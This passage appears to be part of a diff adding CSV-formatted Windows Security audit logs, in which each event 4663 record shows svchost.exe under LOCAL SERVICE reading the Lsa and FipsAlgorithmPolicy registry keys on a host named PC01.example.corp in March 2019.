+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452832</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452831</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452830</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452829</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452828</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452827</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452826</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452825</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452824</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.205246Z"">
+    </TimeCreated>
+    <EventRecordID>452823</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.185218Z"">
+    </TimeCreated>
+    <EventRecordID>452822</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.185218Z"">
+    </TimeCreated>
+    <EventRecordID>452821</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.045016Z"">
+    </TimeCreated>
+    <EventRecordID>452820</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.045016Z"">
+    </TimeCreated>
+    <EventRecordID>452819</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.904814Z"">
+    </TimeCreated>
+    <EventRecordID>452818</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.904814Z"">
+    </TimeCreated>
+    <EventRecordID>452817</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.764613Z"">
+    </TimeCreated>
+    <EventRecordID>452816</EventRecordID>
+    <Correlation>
